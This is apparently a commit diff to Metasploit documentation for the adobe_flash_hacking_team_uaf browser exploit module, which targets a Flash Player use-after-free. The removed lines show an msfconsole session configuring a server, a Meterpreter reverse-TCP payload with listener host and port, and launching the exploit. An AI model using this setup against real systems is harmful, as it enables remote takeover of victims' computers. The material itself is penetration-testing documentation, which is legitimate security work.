Documentation on adobe_flash_hacking_team_uaf updated 1.4

bug/bundler_fix
itsmeroy2012 2017-03-25 12:52:12 +05:30
parent b2e6c22fdf
commit 6b6dd73b09
1 changed files with 1 additions and 32 deletions

View File

@ -7,9 +7,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability,
4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194.
5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
## Adobe Flash Player
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.
## Verification Steps
@ -32,36 +31,6 @@ msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160
srvhost => 172.16.178.160
msf exploit(adobe_flash_hacking_team_uaf) > set uripath /
uripath => /
msf exploit(adobe_flash_hacking_team_uaf) > show options
Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf):
Name Current Setting Required Description
---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.178.160 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(adobe_flash_hacking_team_uaf) > exploit
[*] Exploit running as background job.